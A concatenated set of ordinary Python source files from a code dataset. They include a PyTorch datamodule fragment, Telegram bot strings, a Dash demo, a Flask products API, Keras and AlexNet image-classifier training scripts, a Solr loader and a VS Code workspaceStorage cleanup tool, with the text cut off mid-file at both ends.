= False,\n batch_size: int = 32,\n seed: int = 42,\n shuffle: bool = False,\n pin_memory: bool = False,\n drop_last: bool = False,\n batches_per_epoch: int = 1024\n ):\n super().__init__(train_transforms, val_transforms, test_transforms)\n self.buffer = None\n self.train_set = None\n self.val_set = None\n self.val_split = val_split\n self.num_workers = num_workers\n self.normalize = normalize\n self.batch_size = batch_size\n self.batches_per_epoch = batches_per_epoch\n self.seed = seed\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.val_sampler = None\n self.train_sampler = None\n\n self.train_set = H5ImageLabelIterableDataset(filename, 'train', train_transforms, batch_size=batch_size, num_workers=num_workers)\n #self.train_set = H5ImageLabelDataset(filename, 'train', train_transforms, batch_size=batch_size)\n self.train_set.transforms = self.train_transforms\n\n self.val_set = H5ImageLabelIterableDataset(filename, 'val', val_transforms, batch_size=batch_size, num_workers=num_workers)\n #self.val_set = H5ImageLabelDataset(filename, 'val', val_transforms, batch_size=batch_size)\n self.val_set.transforms = self.val_transforms\n\n\n def _collate(self, worker_data):\n xb, yb, zb, labels = [], [], [], []\n for (x, y, z), l in worker_data:\n xb.append(x)\n yb.append(y)\n zb.append(z)\n labels.append(l)\n xb = torch.cat(xb, dim=0)\n yb = torch.cat(yb, dim=0)\n zb = torch.cat(zb, dim=0)\n labels = torch.from_numpy(np.concatenate(labels, axis=0))\n return (xb, yb, zb), labels\n\n def _data_loader(self, dataset: torch.utils.data.Dataset) -> torch.utils.data.DataLoader:\n return torch.utils.data.DataLoader(\n dataset,\n batch_size=self.num_workers,\n num_workers=self.num_workers,\n pin_memory=False,\n shuffle=False,\n collate_fn=self._collate,\n prefetch_factor=1,\n )\n\n def train_dataloader(self, *args: Any, **kwargs: Any) -> DataLoader:\n \"\"\" The train dataloader \"\"\"\n return self._data_loader(self.train_set)\n\n def val_dataloader(self, *args: Any, **kwargs: Any) -> Union[DataLoader, List[DataLoader]]:\n \"\"\" The val dataloader \"\"\"\n return self._data_loader(self.val_set)\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return self.train_set.num_classes\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return self.train_set.name_classes\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--source_filename', required=True)\n parser.add_argument('--chunk_size', required=True, type=int)\n parser.add_argument('--dest_filename', required=True)\n parser.add_argument('--compression_opts', type=int, default=6)\n parser.add_argument('--dataset', choices=['reward', 'action'], required=True)\n args = parser.parse_args()\n\n def identity(x):\n return x\n\n if args.dataset == 'reward':\n ds = H5NextStateReward()\n ds.transforms = identity\n ds.load(args.source_filename)\n\n elif args.dataset == 'action':\n ds = PolicyActionLabels()\n ds.transforms = identity\n ds.load(args.source_filename)\n else:\n raise Exception\n\n class_dict = dict(zip(ds.name_classes, range(len(ds.name_classes))))\n num_chunks = len(ds) // args.chunk_size\n write_balanced_splits(ds, dest_filename=args.dest_filename, class_dict=class_dict,\n chunk_size=args.chunk_size, num_chunks=num_chunks,\n compression='gzip', 
compression_opts=args.compression_opts)","repo_name":"DuaneNielsen/barlow_twins","sub_path":"datamodule.py","file_name":"datamodule.py","file_ext":"py","file_size_in_byte":15731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28057452103","text":"from pyrogram.types import InlineKeyboardButton\nfrom creds import cred\n\nwelcome = \"\\nЁЯФе Give me the subtitle file you want to translate.\\n\\nЁЯП╡я╕П Join & тЭдя╕П support @PF_HW\\n\\nЁЯП╡я╕П Tv/Web series @PF_TV\"\nabout = (\n \"ЁЯНО Channel : [PF HW](t.me/PF_HW)\\nЁЯСитАНЁЯТ╗ Creater: [ сНХр╣П╧З╔к╧▓ ╔пр╣П╩Е╧Э ](t.me/Ab_wolf)\\nтЪбя╕П Language: [\"\n \"Python3](https://python.org)\\nЁЯУж Library : [Pyrogram](https://docs.pyrogram.org/) \\nЁЯТа Server : [Heroku](\"\n \"https://herokuapp.com/) \"\n)\nhelp_text = (\n \"**Steps to follow**\\n\\n`This is a subtitle translator bot`\\n**1.** `Send me the subtitle file inorder to \"\n \"translate.`\\n**2.** `Select the destination language(dont press multiple buttons).`\\n**3.** `Wait some time \"\n \"to complete the translation.`\\n\\n**Keep in mind**\\n\\n**1.** `You can only translate one subtitle at a \"\n \"time`\\n**2.** `Dont forward bulk files together , You will be banned` \"\n)\neta_text = (\n \"**File name :** `{}`\\n**Done** `{}` **of** `{}`\\n**Percentage:** {}%\\n**Speed:** {} lines/sec\\n**ETA:** {}\\n[{\"\n \"}{}] \"\n)\ncaption = f\"ЁЯе║ Please join @PF_HW\"\nempty = \"ЁЯдФ You need to send a subtitle (srt) file inorder to translate it \"\nmmtypes = [\n \"text/plain\",\n \"application/x-subrip\",\n \"application/octet-stream\",\n \"application/binary\",\n]\nerr1 = \"**__One subtitle is processing wait sometime__**\"\nerr2 = \"**__This is not a subtitle(srt) file__**\"\nerr3 = \"**Todays limit exceeded**\"\nerr4 = \"**Unsupported characters in file**\"\nerr5 = \"**Some errors happened Try again..**\"\n\nlangs = [\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р┤ор┤▓р┤пр┤╛р┤│р┤В\", callback_data=\"Malayalam\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ родрооро┐ро┤рпН\", callback_data=\"Tamil\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рд╣рд┐рдиреНрджреА\", callback_data=\"Hindi\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р▓Хр▓ир│Нр▓ир▓б\", callback_data=\"Kannada\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ р░др▒Жр░▓р▒Бр░Чр▒Б\", callback_data=\"Telugu\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рдорд░рд╛рдареА\", callback_data=\"Marathi\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ ркЧрлБркЬрк░рк╛ркдрлА\", callback_data=\"Gujarati\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рмУрмбрм╝рм┐рмЖ\", callback_data=\"Odia\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ ржмрж╛ржВрж▓рж╛\", callback_data=\"bn\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ│ рикрй░риЬри╛римрйА\", callback_data=\"Punjabi\"),\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ╖ ┘Б╪з╪▒╪│█М\", callback_data=\"Persian\"),\n InlineKeyboardButton(\"ЁЯЗ║ЁЯЗ▓ English\", callback_data=\"English\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗкЁЯЗ╕ espa├▒ol\", callback_data=\"Spanish\"),\n InlineKeyboardButton(\"ЁЯЗлЁЯЗ╖ fran├зais\", callback_data=\"French\"),\n InlineKeyboardButton(\"ЁЯЗ╖ЁЯЗ║ ╤А╤Г╤Б╤Б╨║╨╕╨╣\", callback_data=\"Russian\"),\n ],\n [\n InlineKeyboardButton(\"ЁЯЗоЁЯЗ▒ ╫в╓┤╫С╫и╓┤╫Щ╫к\", callback_data=\"hebrew\"),\n InlineKeyboardButton(\"ЁЯЗжЁЯЗк ╪з┘Д╪╣╪▒╪и┘К╪й\", callback_data=\"arabic\"),\n 
],\n]\n","repo_name":"TharukRenuja/SubtitleTranslator-Bot","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31508210939","text":"import json\nfrom textwrap import dedent as d\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nstyles = {\n 'pre': {\n 'border': 'thin lightgrey solid',\n 'overflowX': 'scroll'\n }\n}\n\napp.layout = html.Div([\n dcc.Graph(\n id='basic-interactions',\n figure={\n 'data': [\n {\n 'x': [1, 2, 3, 4],\n 'y': [4, 1, 3, 5],\n 'text': ['a', 'b', 'c', 'd'],\n 'customdata': ['c.a', 'c.b', 'c.c', 'c.d'],\n 'name': 'Trace 1',\n 'mode': 'markers',\n 'marker': {'size': 12}\n },\n {\n 'x': [1, 2, 3, 4],\n 'y': [9, 4, 1, 4],\n 'text': ['w', 'x', 'y', 'z'],\n 'customdata': ['c.w', 'c.x', 'c.y', 'c.z'],\n 'name': 'Trace 2',\n 'mode': 'markers',\n 'marker': {'size': 12}\n }\n ],\n 'layout': {\n 'clickmode': 'event+select'\n }\n }\n ),\n\n html.Div(className='row', children=[\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Hover Data**\n\n Mouse over values in the graph.\n \"\"\")),\n html.Pre(id='hover-data', style=styles['pre'])\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Click Data**\n\n Click on points in the graph.\n \"\"\")),\n html.Pre(id='click-data', style=styles['pre']),\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Selection Data**\n\n Choose the lasso or rectangle tool in the graph's menu\n bar and then select points in the graph.\n\n Note that if `layout.clickmode = 'event+select'`, selection data also \n accumulates (or un-accumulates) selected data if you hold down the shift\n button while clicking.\n \"\"\")),\n html.Pre(id='selected-data', style=styles['pre']),\n ], className='three columns'),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n **Zoom and Relayout Data**\n\n Click and drag on the graph to zoom or click on the zoom\n buttons in the graph's menu bar.\n Clicking on legend items will also fire\n this event.\n \"\"\")),\n html.Pre(id='relayout-data', style=styles['pre']),\n ], className='three columns')\n ])\n])\n\n@app.callback(\n Output('hover-data', 'children'),\n [Input('basic-interactions', 'hoverData')])\ndef display_hover_data(hoverData):\n return json.dumps(hoverData, indent=2)\n\n\n@app.callback(\n Output('click-data', 'children'),\n [Input('basic-interactions', 'clickData')])\ndef display_click_data(clickData):\n return json.dumps(clickData, indent=2)\n\n\n@app.callback(\n Output('selected-data', 'children'),\n [Input('basic-interactions', 'selectedData')])\ndef display_selected_data(selectedData):\n return json.dumps(selectedData, indent=2)\n\n\n@app.callback(\n Output('relayout-data', 'children'),\n [Input('basic-interactions', 'relayoutData')])\ndef display_selected_data(relayoutData):\n return json.dumps(relayoutData, indent=2)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","repo_name":"uwescience/ADUniverse","sub_path":"examples/dash_multipanel.py","file_name":"dash_multipanel.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"1268193962","text":"from flask import *\nfrom flask_restful import 
reqparse, Resource\n#import werkzeug\nfrom login import loginRequired\nfrom werkzeug.utils import secure_filename\n\nfrom core import Core\n\npostargs = reqparse.RequestParser()\n\npostargs.add_argument('name', type=str, required=True)\npostargs.add_argument('amount', type=int, required=True)\npostargs.add_argument('quantity', type=int, required=True)\n\nclass Products(Resource):\n \n def __init__(self):\n pass\n\t \n def post(self):\n #curl cmd : curl -i -H \"Content-Type: application/json\" -X POST -d \"{\\\"name\\\" : \\\"Coca Cola 500 mL\\\", \\\"amount\\\" : 60, \\\"quantity\\\" : 10}\" http://127.0.0.1:8888/qrcode/products\n prdct_info = postargs.parse_args()\n prdct_info['product_id'] = Core.get_instance().create_random(5)\n Core.get_instance().write_data_to_product_db(prdct_info)\n msg = 'Product information posted successfully' #% (poolName)\n return {'status': \"true\", 'message': msg}, 201\n\n def get(self):\n #curl cmd : curl -i -H \"Content-Type: application/json\" -X GET http://127.0.0.1:8888/qrcode/products\n product_data = Core.get_instance().read_data_from_product_db()\n datadict = {}\n datalist = []\n for data in product_data:\n #print '%s' %data\n #print data['name'],data['quantity'],data['amount'],data['product_id']\n datadict[\"Product name\"] = data['name']\n datadict[\"Quantity\"] = data['quantity']\n datadict[\"Amount\"] = data['amount']\n datadict[\"Product_id\"] = data['product_id']\n datalist.append(datadict.copy())\n return datalist\n\n\n \n","repo_name":"learn-coding/QRCode","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17490922218","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom keras.utils import to_categorical\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport argparse\r\nimport random\r\nimport cv2\r\nimport os\r\nfrom skimage import io\r\nimport tensorflow as tf\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers.convolutional import Conv2D\r\nfrom keras.layers.convolutional import MaxPooling2D\r\nfrom keras.layers.core import Activation\r\nfrom keras.layers.core import Flatten\r\nfrom keras.layers.core import Dense\r\nfrom keras import backend as K\r\nfrom keras.utils.vis_utils import plot_model\r\nfrom skimage import io\r\nfrom skimage.transform import resize, rescale, rotate, setup, warp, AffineTransform\r\nimport pandas as pd\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\n\r\nclass net:\r\n @staticmethod\r\n def build(height,width,depth,num_classes):#Number of channels-1(grayscale),3(RGB)\r\n model=Sequential()\r\n shape=(height,width,depth)\r\n #Channel last ordering is default for tensorflow\r\n if K.image_data_format()==\"channels_first\":\r\n shape=(depth,height,width)\r\n #To add layers for model->Layer1\r\n model.add(Conv2D(30,(5,5),padding=\"same\",input_shape=shape))\r\n model.add(Activation(\"relu\"))\r\n model.add(MaxPooling2D(pool_size=(2,2),strides=(2,2)))#Moves 2 steps along x and y directions\r\n #Layer2\r\n model.add(Conv2D(60,(5,5),padding=\"same\"))#The same padding means zero padding is provided,whereas in VALID->No zero padding,values are dropped \r\n model.add(Activation(\"relu\"))\r\n model.add(MaxPooling2D(pool_size=(2,2),strides=(2,2)))\r\n #FUlly 
connected layer->We flatten out our inputs\r\n model.add(Flatten())\r\n model.add(Dense(500))\r\n model.add(Activation(\"relu\"))\r\n #Softmax classifier layer->This must have the same number of nodes as the output layer\r\n #Two types of softmax ->Full softmax(is good when the dataset is small),Candidate softmax(Better for larger sets)\r\n #This will yield the probability of each class\r\n model.add(Dense(num_classes))\r\n model.add(Activation(\"softmax\"))\r\n return model\r\n\r\ntotal_epoch=50\r\nlearning_rate=0.001\r\nbatch_size=50\r\n\r\ndata=[]\r\nlabels=[]\r\ntemp=[]\r\n\r\nfor root,sub,files in os.walk('G:\\pro'):\r\n for name in files:\r\n num=os.path.join(root,name)\r\n data.append(num)\r\n \r\nfor image in data:\r\n im1=io.imread(image)\r\n im2=resize(im1,(224,224))\r\n im3=img_to_array(im2)\r\n temp.append(im3)\r\n#temp contains images\r\nfor path in data:\r\n path=path.split(os.path.sep)[-2]\r\n if path=='India Gate':\r\n label=1\r\n labels.append(label)\r\n elif path=='Qutub Minar':\r\n label=2\r\n labels.append(label)\r\n elif path=='Taj Mahal':\r\n label=3\r\n labels.append(label)\r\n\r\n#labels contains labels\r\n\r\n#After obtaining images and labels,split them into train and test\r\n#scale the intensities to [0,1]\r\ntemp_array=np.array(temp,dtype=\"float\")/255.0\r\nlabel_array=np.array(labels)\r\n(trainX,testX,trainY,testY)=train_test_split(temp_array,label_array,test_size=0.20,random_state=42)\r\n#Convert integers to vectors\r\ntrainY= pd.get_dummies(trainY).values\r\ntestY=pd.get_dummies(testY).values#get them in the form of one hot labels in array\r\n#matrix multiplication with np.zeros\r\n\r\n#Next is data augmentation-TO increase the number of samples\r\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\r\n\theight_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\r\n\thorizontal_flip=True, fill_mode=\"nearest\")\r\n\r\nprint('Compiling model....')\r\nmodel=net.build(height=224,width=224,depth=3,num_classes=3)\r\nopt=Adam(lr=learning_rate,decay=learning_rate/total_epoch)\r\nmodel.compile(loss=\"binary_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\r\n\r\nprint(\"training network..........\")\r\ntrain_test_fit=model.fit_generator(aug.flow(trainX,trainY,batch_size=batch_size),validation_data=(testX,testY),steps_per_epoch=len(trainX)//batch_size,epochs=total_epoch,verbose=1)\r\n\r\nmodel.summary()#To give the summary of each of the layers.\r\ntest_pred=model.predict(testX)\r\ntest_pred=(test_pred>0.5)\r\ncm=confusion_matrix(testY.argmax(axis=1),test_pred.argmax(axis=1))\r\n\r\n\r\n","repo_name":"AditiDeepak/DL_App","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24941668140","text":"#! 
/usr/bin/python\n\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"Parama_Fadli_Kurnia\"\n__date__ = \"$Apr 12, 2016 5:03:30 PM$\"\n\nfrom py.solry import MakeSolr\n\nmsl = MakeSolr()\nlimit = 500000\noffset = 0\n\nmsl.insert_data(offset, limit)\n","repo_name":"fadlikurnia/solrpy","sub_path":"solrapi.py","file_name":"solrapi.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32431510464","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 23:20:22 2020\nExperiment 8\nCode reference:\nhttp://datahacker.rs/tf-alexnet/\n\n@author: AlexNet\n\"\"\"\n\nimport datetime\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.losses import categorical_crossentropy\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout\n\n\nimport urllib.request\nimport requests\nimport PIL.Image\nimport numpy as np\nimport cv2\nfrom bs4 import BeautifulSoup\n\n#ship synset\npage = requests.get(\"http://www.image-net.org/api/text/imagenet.synset.geturls?wnid=n04194289\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n#bicycle synset\nbikes_page = requests.get(\"http://www.image-net.org/api/text/imagenet.synset.geturls?wnid=n02834778\")\nbikes_soup = BeautifulSoup(bikes_page.content, 'html.parser')\n\nstr_soup=str(soup)\nsplit_urls=str_soup.split('\\r\\n')\n\nbikes_str_soup=str(bikes_soup)\nbikes_split_urls=bikes_str_soup.split('\\r\\n')\n\n#\n#!mkdir /content/train\n#!mkdir /content/train/ships\n#!mkdir /content/train/bikes\n#!mkdir /content/validation\n#!mkdir /content/validation/ships\n#!mkdir /content/validation/bikes\n\nimg_rows, img_cols = 32, 32\ninput_shape = (img_rows, img_cols, 3)\n\ndef url_to_image(url):\n    resp = urllib.request.urlopen(url)\n    image = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n    image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n    return image\n\nn_of_training_images=100\nfor progress in range(n_of_training_images):\n    if not split_urls[progress] == None:\n        try:\n            I = url_to_image(split_urls[progress])\n            if (len(I.shape))==3:\n                save_path = '/content/train/ships/img'+str(progress)+'.jpg'\n                cv2.imwrite(save_path,I)\n        except:\n            None\n\nfor progress in range(n_of_training_images):\n    if not bikes_split_urls[progress] == None:\n        try:\n            I = url_to_image(bikes_split_urls[progress])\n            if (len(I.shape))==3:\n                save_path = '/content/train/bikes/img'+str(progress)+'.jpg'\n                cv2.imwrite(save_path,I)\n        except:\n            None\n\n\nfor progress in range(50):\n    if not split_urls[progress] == None:\n        try:\n            I = url_to_image(split_urls[n_of_training_images+progress])\n            if (len(I.shape))==3:\n                save_path = '/content/validation/ships/img'+str(progress)+'.jpg'\n                cv2.imwrite(save_path,I)\n        except:\n            None\n\n\nfor progress in range(50):\n    if not bikes_split_urls[progress] == None:\n        try:\n            I = url_to_image(bikes_split_urls[n_of_training_images+progress])\n            if (len(I.shape))==3:\n                save_path = '/content/validation/bikes/img'+str(progress)+'.jpg'\n                cv2.imwrite(save_path,I)\n        except:\n            None\nnum_classes = 2\n\n# AlexNet model\nclass AlexNet(Sequential):\n    def __init__(self, input_shape, num_classes):\n        
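# Editor's comment: the layer stack below follows the canonical AlexNet topology, five conv\n        # layers interleaved with three max-pools, then Flatten and four dense layers ending in a\n        # softmax classifier; the model is compiled with Adam and categorical cross-entropy.\n        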
super().__init__()\n\n self.add(Conv2D(96, kernel_size=(11,11), strides= 4,\n padding= 'valid', activation= 'relu',\n input_shape= input_shape,\n kernel_initializer= 'he_normal'))\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None))\n\n self.add(Conv2D(256, kernel_size=(5,5), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None)) \n\n self.add(Conv2D(384, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(Conv2D(384, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(Conv2D(256, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None))\n\n self.add(Flatten())\n self.add(Dense(4096, activation= 'relu'))\n self.add(Dense(4096, activation= 'relu'))\n self.add(Dense(1000, activation= 'relu'))\n self.add(Dense(num_classes, activation= 'softmax'))\n\n self.compile(optimizer= tf.keras.optimizers.Adam(0.001),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel = AlexNet((227, 227, 3), num_classes)\n\n# some training parameters\nEPOCHS = 100\nBATCH_SIZE = 32\nimage_height = 227\nimage_width = 227\ntrain_dir = \"train\"\nvalid_dir = \"validation\"\nmodel_dir = \"my_model.h5\"\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=0.1)\n\ntrain_generator = train_datagen.flow_from_directory(train_dir,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=BATCH_SIZE,\n seed=1,\n shuffle=True,\n class_mode=\"categorical\")\n\nvalid_datagen = ImageDataGenerator(rescale=1.0/255.0)\nvalid_generator = valid_datagen.flow_from_directory(valid_dir,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=BATCH_SIZE,\n seed=7,\n shuffle=True,\n class_mode=\"categorical\"\n )\ntrain_num = train_generator.samples\nvalid_num = valid_generator.samples\n\nlog_dir=\"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\ncallback_list = [tensorboard_callback]\n\n# start training\nmodel.fit(train_generator,\n epochs=EPOCHS,\n steps_per_epoch=train_num // BATCH_SIZE,\n validation_data=valid_generator,\n validation_steps=valid_num // BATCH_SIZE,\n callbacks=callback_list,\n verbose=0)\n\n# save the whole model\nmodel.save(model_dir)\n","repo_name":"yhily/deep-learning-resource","sub_path":"srcs/chap07/思考与练习/alex.py","file_name":"alex.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"3286603243","text":"import datetime as dt\nimport getpass\nimport json\nimport shutil\nimport sys\nfrom pathlib import Path\nfrom urllib.parse import unquote, urlparse\nimport readline\nfrom dataclasses import dataclass\n\nimport colorama\nfrom colorama import Back, Fore, Style\n\ncolorama.init()\n\n\ndef printWithColor(\n message: str,\n foreground_color: Fore = Fore.RESET,\n background_color: Back = Back.BLACK,\n end: str = \"\\n\",\n):\n \"\"\"Prints colored text if colorama is installed\n\n Args:\n message (str): The thing you want to print\n 
foreground_color (Fore): Foreground color of the text. Defaults to Fore.RESET.\n        background_color (Back): Background color of the text. Defaults to Back.BLACK.\n        end (str, optional): end parameter of the print. Defaults to '\\n'.\n    \"\"\"\n\n    print(foreground_color + background_color + message + Style.RESET_ALL, end=end)\n\n@dataclass\nclass Folder:\n    path: str\n    workspace_exists: bool\n    is_old: bool\n    sizeinbytes: int\n\ndef format_size(size_bytes: int) -> str:\n    \"\"\"Converts size as bytes to human readable format\n\n    Args:\n        size_bytes (int): Size to convert\n\n    Returns:\n        str: Human readable size in str format\n    \"\"\"\n    units = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n    size = size_bytes\n    unit_index = 0\n    while size >= 1024 and unit_index < len(units) - 1:\n        size /= 1024\n        unit_index += 1\n    return f\"{size:.2f} {units[unit_index]}\"\n\n\ndef getDefaultWSSFolderPath() -> str:\n    \"\"\"Returns the default workspaceStorage path based on the operating system that the script runs on\n\n    Returns:\n        str: Path of workspaceStorage folder\n    \"\"\"\n    username = getpass.getuser()\n\n    if sys.platform in (\"linux\", \"linux2\"):\n        return str(Path(f\"/home/{username}/.config/Code/User/workspaceStorage/\"))\n    elif sys.platform == \"darwin\":\n        return str(\n            Path(\n                f\"/Users/{username}/Library/Application Support/Code/User/workspaceStorage/\"\n            )\n        )\n    elif sys.platform in (\"win32\", \"win64\"):\n        return str(\n            Path(f\"C:/Users/{username}/AppData/Roaming/Code/User/workspaceStorage/\")\n        )\n\n    return \"\"\n\n\ndef isValidWSSPath(path: str) -> bool:\n    \"\"\"Checks if the given folder path is a valid workspaceStorage folder\n\n    Args:\n        path (str): Path to check\n\n    Returns:\n        bool: True if given folder path is a valid workspaceStorage folder\n    \"\"\"\n    if not Path(path).exists() or not Path(path).is_dir():\n        return False\n\n    folders = [content for content in Path(path).iterdir()]\n    return all(\n        Path( Path(path) / folder / \"workspace.json\" ).exists()\n        for folder in folders\n    )\n\n\ndef askForValidWSSPath() -> str:\n    \"\"\"Continuously asks user for a valid workspaceStorage path\n\n    Returns:\n        str: A valid workspaceStorage path\n    \"\"\"\n    while True:\n        path = input(\"Please enter a valid workspaceStorage path: \")\n        if isValidWSSPath(path):\n            return path\n\n\ndef askYesNoQuestion(\n    questionBody: str, yes_patterns: list[str] = None, no_patterns: list[str] = None, return_for_none: bool = False\n) -> bool:\n    \"\"\"Asks user a yes/no question.\n\n    Args:\n        questionBody (str): Body of the question\n        yes_patterns (list[str], optional): Strings that are considered yes. User input is lowered by default so no need to put both lower and upper versions of the same string. Defaults to ['y', 'yes'].\n        no_patterns (list[str], optional): Strings that are considered no. User input is lowered by default so no need to put both lower and upper versions of the same string. 
Defaults to ['n', 'no'].\n\n Returns:\n bool: Returns true if lowered input is in yes_patterns, false if lowered input is in no_patterns\n \"\"\"\n if yes_patterns is None:\n yes_patterns = [\"y\", \"yes\"]\n if no_patterns is None:\n no_patterns = [\"n\", \"no\"]\n while True:\n print(questionBody, end=\"\")\n printWithColor(\" (\", Fore.MAGENTA, end=\"\")\n printWithColor(\"Y\" if return_for_none else \"y\", Fore.GREEN, end=\"\")\n printWithColor(\"/\", Fore.MAGENTA, end=\"\")\n printWithColor(\"N\" if not return_for_none else \"n\", Fore.RED, end=\"\")\n printWithColor(\")\", Fore.MAGENTA, end=\"\")\n inp = input(\": \")\n if inp.lower() in yes_patterns:\n return True\n elif inp.lower() in no_patterns:\n return False\n\n if not inp:\n return return_for_none\n\n printWithColor(\"Please provide a valid answer...\", Fore.RED)\n\n\ndef getSizeOfFolder(path: str) -> int:\n \"\"\"Calculates a foldersize recursively\n\n Args:\n path (str): Path to calculate size of\n\n Returns:\n int: Total size in bytes\n \"\"\"\n\n total_size = 0\n for full_path in Path(path).iterdir():\n if Path(full_path).is_file():\n total_size += Path(full_path).stat().st_size\n elif Path(full_path).is_dir():\n total_size += getSizeOfFolder(full_path)\n return total_size\n\n\ndef parseWSSFolder(path: str) -> list[Folder]:\n \"\"\"Parses workspaceStorage folder\n Args:\n path (str): workspaceStorage path\n Returns:\n list[Folder]: List of folders\n \"\"\"\n\n result_list: list[Folder] = []\n for folder_path in Path(path).iterdir():\n json_text = \"\"\n\n with (folder_path / \"workspace.json\").open(\"r\") as file:\n json_text = file.read()\n\n data = json.loads(json_text)\n\n if \"folder\" not in data:\n continue\n\n target_folder_name = Path(unquote(urlparse(data[\"folder\"]).path))\n\n # Consider a folder \"old\" if it isn't modified in the last 30 days\n last_modified = dt.datetime.fromtimestamp(Path(folder_path).stat().st_mtime)\n now = dt.datetime.now()\n delta = now - last_modified\n is_old = delta.days > 30\n\n result_list.append(\n Folder(\n path=str(folder_path),\n workspace_exists=target_folder_name.is_dir(),\n is_old=is_old,\n sizeinbytes=getSizeOfFolder(str(folder_path)),\n )\n )\n\n return result_list\n\ndef main():\n # Enable filesystem autocompletion\n readline.set_completer_delims('\\t\\n')\n readline.parse_and_bind('tab: complete')\n \n printWithColor(\"Looking for workspaceFolder path...\", Fore.BLUE)\n wss_path = getDefaultWSSFolderPath()\n\n if not wss_path:\n printWithColor(\"This OS is not supported.\", Fore.RED)\n return\n\n if not isValidWSSPath(wss_path):\n printWithColor(\"Script couldn't find workspaceStorage folder.\", Fore.YELLOW)\n askForValidWSSPath()\n else:\n printWithColor(f\"Found workspaceStorage folder in {wss_path}\", Fore.GREEN)\n if 